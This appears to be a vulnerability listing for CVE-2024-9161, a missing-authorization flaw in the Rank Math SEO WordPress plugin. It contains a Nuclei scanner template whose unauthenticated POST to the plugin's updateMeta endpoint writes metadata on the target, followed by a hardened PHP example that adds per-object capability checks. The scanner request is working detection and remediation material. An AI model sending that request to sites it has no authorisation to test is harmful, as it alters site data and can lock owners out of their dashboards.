| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-9161 | 5 Oct 2024 14:36 | – | circl |
| WordPress plugin Rank Math SEO security vulnerability | 5 Oct 2024 00:00 | – | cnnvd |
| CVE-2024-9161 | 5 Oct 2024 11:21 | – | cve |
| CVE-2024-9161 Rank Math SEO – AI SEO Tools to Dominate SEO Rankings <= 1.0.228 - Missing Authorization to Unauthenticated User and Term Metadata Insert, Update, and Delete | 5 Oct 2024 11:21 | – | cvelist |
| EUVD-2024-49763 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2024-9161 | 5 Oct 2024 12:15 | – | nvd |
| Rank Math SEO with AI SEO Tools Plugin < 1.0.229 Multiple Vulnerabilities | 25 Nov 2024 00:00 | – | openvas |
| WordPress Rank Math SEO Plugin <= 1.0.228 is vulnerable to Broken Access Control | 7 Oct 2024 00:00 | – | patchstack |
| WordPress Rank Math SEO plugin <= 1.0.228 - Missing Authorization to Unauthenticated User and Term Metadata Insert, Update, and Delete vulnerability | 7 Oct 2024 00:37 | – | patchstack |
| PT-2024-39463 · WordPress · Rank Math Seo | 5 Oct 2024 00:00 | – | ptsecurity |
```yaml
id: CVE-2024-9161

info:
  name: Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion
  author: Kazgangap
  severity: medium
  description: |
    Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
  impact: |
    Unauthenticated attackers can modify or delete metadata, leading to data loss and potential denial of access to the admin dashboard.
  remediation: |
    Update to version 1.0.229 or later.
  reference:
    - https://wpscan.com/vulnerability/95be2559-f0e2-4e98-9bef-3989df0d25bf/
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L120
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L161
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L162
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L64
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-9161
    cwe-id: CWE-862
    epss-score: 0.02045
    epss-percentile: 0.78813
    cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rankmath
    product: seo
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/seo-by-rank-math/"
    fofa-query: body="/wp-content/plugins/seo-by-rank-math/"
    publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
  tags: cve,cve2024,wordpress,seo-by-rank-math,wp-plugin,wpscan,rankmath,intrusive,vkev

variables:
  # random object id and a random, recognisable meta key for the write check
  objectid: "{{rand_int(1,9)}}"
  data: "meta_{{to_lower(rand_text_alpha(12))}}"

# the second request is only sent when the first (fingerprint) request matches
flow: http(1) && http(2)

http:
  # request 1: confirm the plugin is installed before touching any data
  - raw:
      - |
        GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Rank Math")'
        condition: and
        internal: true

  # request 2: unauthenticated metadata write; this persists on the target,
  # which is why the template carries the "intrusive" tag
  - raw:
      - |
        POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "objectType": "user",
          "objectID": {{objectid}},
          "meta": {
            "{{data}}": "{{data}}"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"slug", "true", "schemas")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450220161ba04fccf9e58b9f4da79c1e91d027d1bfa664764925012c93bd67d7c64611022100fb17a8db12d7516017c9bb100eb0cacab37be89ef3233747271a5c312b3da253:922c64590222798bb761d5b6d8e72950
```
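The defect the template probes is a REST endpoint that writes object metadata without any authorization check (CWE-862). The following is an added illustration, not Rank Math's code and not from the template above: a hypothetical plugin's `/updateMeta` route in the weak form, then a hardened form that validates the request, ties authorization to the specific object via WordPress meta capabilities, and restricts writes to plugin-owned meta keys. Everything prefixed `example_` is invented for this example; the WordPress core functions used (`register_rest_route`, `current_user_can`, `is_protected_meta`, `update_metadata`, `delete_metadata`, `rest_authorization_required_code`) exist as called.

```php
<?php
/**
 * Added example (not Rank Math's code): a hypothetical plugin's REST route for
 * inserting, updating and deleting object metadata. The names prefixed
 * "example_" are assumptions made for this illustration.
 */

// WEAK PATTERN (shown for contrast, not registered): with '__return_true' as
// the permission callback the route accepts every caller, so an unauthenticated
// request can write user, term or post meta. This is CWE-862.
//
// register_rest_route( 'example/v1', '/updateMeta', array(
//     'methods'             => 'POST',
//     'callback'            => 'example_update_meta',
//     'permission_callback' => '__return_true',
// ) );

// HARDENED PATTERN: schema-validate the arguments and run an authorization
// check that is bound to the object being edited.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/updateMeta', array(
        'methods'             => 'POST',
        'callback'            => 'example_update_meta',
        'permission_callback' => 'example_update_meta_permission',
        'args'                => array(
            'objectType' => array( 'required' => true, 'type' => 'string', 'enum' => array( 'post', 'term', 'user' ) ),
            'objectID'   => array( 'required' => true, 'type' => 'integer', 'minimum' => 1 ),
            'meta'       => array( 'required' => true, 'type' => 'object' ),
        ),
    ) );
} );

/**
 * Authorization: the caller must hold the WordPress meta capability for editing
 * this particular object. A logged-out caller (no cookie + nonce, no application
 * password) is user 0, for whom every branch below evaluates to false.
 */
function example_update_meta_permission( WP_REST_Request $request ) {
    $type = $request->get_param( 'objectType' );
    $id   = absint( $request->get_param( 'objectID' ) );

    switch ( $type ) {
        case 'post':
            $allowed = current_user_can( 'edit_post', $id );
            break;
        case 'term':
            // 'edit_term' is a meta capability (WP 4.7+) mapped to the taxonomy's edit_terms cap.
            $allowed = current_user_can( 'edit_term', $id );
            break;
        case 'user':
            $allowed = current_user_can( 'edit_user', $id );
            break;
        default:
            $allowed = false;
    }

    if ( ! $allowed ) {
        return new WP_Error(
            'rest_forbidden',
            'You are not allowed to edit metadata for this object.',
            array( 'status' => rest_authorization_required_code() ) // 401 when logged out, 403 otherwise
        );
    }
    return true;
}

/**
 * Callback: even an authorized caller may only touch plugin-owned keys.
 * The "example_" allowlist keeps core keys such as the capabilities user meta
 * out of reach, and is_protected_meta() additionally refuses "_"-prefixed keys.
 */
function example_update_meta( WP_REST_Request $request ) {
    $type   = $request->get_param( 'objectType' );
    $id     = absint( $request->get_param( 'objectID' ) );
    $meta   = (array) $request->get_param( 'meta' );
    $result = array();

    foreach ( $meta as $key => $value ) {
        $key = sanitize_key( $key );
        if ( 0 !== strpos( $key, 'example_' ) || is_protected_meta( $key, $type ) ) {
            $result[ $key ] = 'rejected';
            continue;
        }
        if ( null === $value || '' === $value ) {
            // An empty value means delete, so deletion gets the same authorization as an update.
            $result[ $key ] = delete_metadata( $type, $id, $key ) ? 'deleted' : 'unchanged';
        } elseif ( is_scalar( $value ) ) {
            $ok = update_metadata( $type, $id, $key, sanitize_text_field( (string) $value ) );
            $result[ $key ] = ( false !== $ok ) ? 'updated' : 'unchanged';
        } else {
            $result[ $key ] = 'rejected'; // nested structures are not accepted by this endpoint
        }
    }
    return rest_ensure_response( $result );
}
```

The permission callback is the control the advisory text says was missing. Note that it is evaluated per object: a caller who can edit their own profile is not thereby allowed to edit user ID 1, and a contributor cannot edit another author's post meta. The key allowlist in the callback is the second layer; without it, an authorized but low-privileged user could still rewrite core meta such as role assignments, which is the kind of write that ends in loss of dashboard access.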